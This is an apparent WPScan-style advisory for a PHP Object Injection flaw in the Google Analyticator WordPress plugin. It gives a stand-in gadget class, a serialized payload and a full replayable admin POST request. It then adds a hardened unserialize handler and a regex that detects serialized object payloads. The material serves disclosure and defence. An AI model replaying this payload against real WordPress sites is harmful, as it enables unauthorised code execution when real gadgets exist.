wpexploit
Author: Nguyễn Phạm Việt Nam
WPEX-ID: DF1C36BB-9861-4272-89C9-AE76E62F687C
Published: Dec 27, 2022 - 12:00 a.m.

Google Analyticator < 6.5.6 - Admin+ PHP Object Injection

Tags: google analyticator, admin, php object injection, arbitrary deserialization, gadget chain, security vulnerability, exploit

EPSS: 0.001 (Low), percentile 36.6%

The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

To simulate a gadget chain, put the following code in the plugin:

// Stand-in gadget: any class whose __wakeup() (or __destruct()) runs on
// unserialize() demonstrates that attacker-controlled objects are instantiated.
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then, as Admin, open the plugin settings page (/wp-admin/admin.php?page=google-analyticator), save the settings and intercept the resulting request; add the parameter ga_domain_names=O:4:"Evil":0:{}; to it and replay it:

POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1

_wpnonce=<nonce-key>&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};


The response will contain the "Arbitrary deserialization" output.
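As an added example that is not part of the advisory or of the plugin's own code: the unsafe unserialize() pattern the advisory describes, next to a hardened handler that refuses to instantiate any object and validates the resulting values, plus a simple heuristic a defender can use to spot serialized object payloads in submitted settings. The function names, the shape of the option and the sample inputs are assumptions.

```php
<?php
// Added example (not the plugin's code). Function and option names are assumptions.

// Unsafe: a user-controlled option value handed straight to unserialize().
// Any class with a __wakeup()/__destruct() side effect is instantiated.
function ga_save_domain_names_unsafe(string $raw): array {
    $value = unserialize($raw);
    return is_array($value) ? $value : [];
}

// Hardened: never instantiate objects (PHP >= 7.0), then validate the shape.
// Better still, store such a setting as a plain string or JSON and avoid
// unserialize() on request data altogether.
function ga_save_domain_names_safe(string $raw): array {
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($value)) {
        return []; // objects become __PHP_Incomplete_Class, not arrays: rejected
    }
    $domains = [];
    foreach ($value as $entry) {
        if (!is_string($entry)) {
            continue;
        }
        $host = strtolower(trim($entry));
        // Accept only a plain hostname; drop anything else.
        if (preg_match('/^[a-z0-9.-]{1,253}$/', $host)) {
            $domains[] = $host;
        }
    }
    return array_values(array_unique($domains));
}

// Detection heuristic: does the submitted value declare a serialized object
// (O: or C: token at the start or after a ; or {)? May false-positive on
// strings that happen to contain such a token; log and review rather than block.
function ga_contains_serialized_object(string $raw): bool {
    return (bool) preg_match('/(?:^|[;{])[OC]:\d+:"/', $raw);
}

// Constructed samples for a local check.
$benign = serialize(['example.com', 'cdn.example.com']); // constructed
$gadget = 'O:4:"Evil":0:{}';                             // payload from the advisory

var_dump(ga_save_domain_names_safe($benign));
var_dump(ga_save_domain_names_safe($gadget));
var_dump(ga_contains_serialized_object($gadget));
var_dump(ga_contains_serialized_object($benign));
```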

